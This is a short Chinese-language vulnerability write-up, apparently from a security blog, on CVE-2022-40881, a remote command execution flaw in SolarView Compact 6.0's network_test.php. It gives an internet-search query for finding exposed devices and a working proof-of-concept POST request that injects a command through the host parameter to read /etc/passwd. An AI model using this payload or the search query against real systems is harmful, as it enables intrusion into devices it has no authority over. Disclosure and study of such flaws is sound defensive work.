SolarView network_test.php 远程命令执行漏洞 CVE-2022-40881
# SolarView network_test.php 远程命令执行漏洞 CVE-2022-40881
## 漏洞描述
SolarView network_test.php 存在远程命令执行漏洞,攻击者通过构造特殊的请求,可以获取服务器权限
##...
SolarView network_test.php 远程命令执行漏洞 CVE-2022-40881
漏洞描述
SolarView network_test.php 存在远程命令执行漏洞,攻击者通过构造特殊的请求,可以获取服务器权限
漏洞影响
SolarView Compact 6.0
网络测绘
body="SolarView Compact" && title=="Top"
漏洞复现
主页面
验证POC
POST /network_test.php
host=%0acat${IFS}/etc/passwd%0a&command=ping
- 发表于 2024-07-12 18:47:36
- 阅读 ( 2294 )
- 分类:Web应用
带头大哥
456 篇文章